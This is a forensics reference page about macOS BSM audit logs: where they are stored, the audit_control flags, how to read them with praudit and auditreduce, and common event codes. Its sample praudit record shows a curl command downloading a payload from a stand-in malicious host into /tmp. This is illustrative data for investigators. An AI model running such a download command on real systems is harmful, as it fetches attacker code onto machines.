System

Audit Trail (BSM)

Overview

macOS includes OpenBSM (Basic Security Module), a kernel-level auditing framework that records security-relevant events including process execution, file access, authentication, and permission changes. When enabled, BSM audit logs provide the most detailed system activity records available on macOS, surpassing even Unified Logs for certain event types.

BSM auditing is not enabled by default on macOS but is commonly activated in enterprise and high-security environments. When present, audit logs are an extremely valuable forensic artifact.

Forensic Significance

Evidence TypeForensic Value
Process executionEvery program launched with full path and arguments
File accessFile open, read, write, delete events
AuthenticationLogin, logout, su, sudo events with success/failure
Permission changesFile permission and ownership modifications
Network connectionsSocket operations and network access
User attributionEvery event tied to a specific UID/EUID

File Locations

ArtifactPathFormat
Audit logs/var/audit/*BSM binary
Current audit trail/var/audit/currentBSM binary (active)
Audit control config/etc/security/audit_controlText
Audit event definitions/etc/security/audit_eventText
Audit user config/etc/security/audit_userText

Audit log files are named with timestamps: YYYYMMDDHHMMSS.YYYYMMDDHHMMSS (start time to end time).

Configuration

audit_control

dir:/var/audit
flags:lo,aa,ex,fc,fd,fw,fm
minfree:5
naflags:lo,aa
policy:cnt,argv,arge
filesz:2M
expire-after:10M

Key flags:

FlagDescription
loLogin/logout
aaAuthentication and authorization
exProgram execution
fcFile creation
fdFile deletion
fwFile write
fmFile attribute modification
frFile read
ntNetwork events

Key Fields for Analysis

Reading Audit Logs

# Convert BSM binary to human-readable text
praudit /var/audit/20260219120000.20260219180000

# Search for specific events
praudit /var/audit/* | grep "execve"

# XML output for parsing
praudit -x /var/audit/20260219120000.20260219180000

# Filter by event type
auditreduce -m AUE_EXECVE /var/audit/* | praudit

Common Event Types

EventCodeDescription
AUE_EXECVE23Process execution
AUE_OPEN_R72File open for reading
AUE_OPEN_W73File open for writing
AUE_UNLINK10File deletion
AUE_RENAME128File rename
AUE_CONNECT62Network connection
AUE_AUTH45023Authentication event
AUE_sudo45042sudo execution
AUE_ssh45029SSH connection

Example Output (praudit)

header,116,11,execve(2),0,Mon Feb 19 14:30:45 2026, + 123 msec
path,/usr/bin/curl
attribute,100755,root,wheel,16777220,1234,0
exec arg,curl
exec arg,-o
exec arg,/tmp/payload.bin
exec arg,https://malicious.example.com/payload
subject,toby,toby,staff,toby,staff,1234,5678,0,192.168.1.100
return,success,0

Analysis Notes

  • Not enabled by default: BSM auditing must be explicitly enabled (sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.auditd.plist). Check audit_control to determine the configuration.
  • Process execution evidence: When ex (execution) auditing is enabled, every process launch is recorded with full path and command-line arguments. This is the most comprehensive execution evidence available on macOS.
  • File access tracking: With fr/fw/fc/fd flags, BSM records which files were accessed, by whom, and when. This is invaluable for data exfiltration investigations.
  • Log rotation: Audit logs rotate based on size (filesz) and expiration (expire-after). Check the configuration to understand retention.
  • Binary format: BSM logs are binary and require praudit or auditreduce to read. The -x flag produces XML output suitable for automated parsing.
  • Enterprise environments: BSM auditing is common in SOC 2 and HIPAA-compliant environments. Its presence indicates a security-conscious organisation.

Tool Support

ToolSupport
macforNot yet implemented (planned)
praudit (macOS built-in)Convert BSM binary to text/XML
auditreduce (macOS built-in)Filter and select audit records
OpenBSMOpen-source BSM implementation

References

Previous
Login Items & Persistence
Next
Crash Reports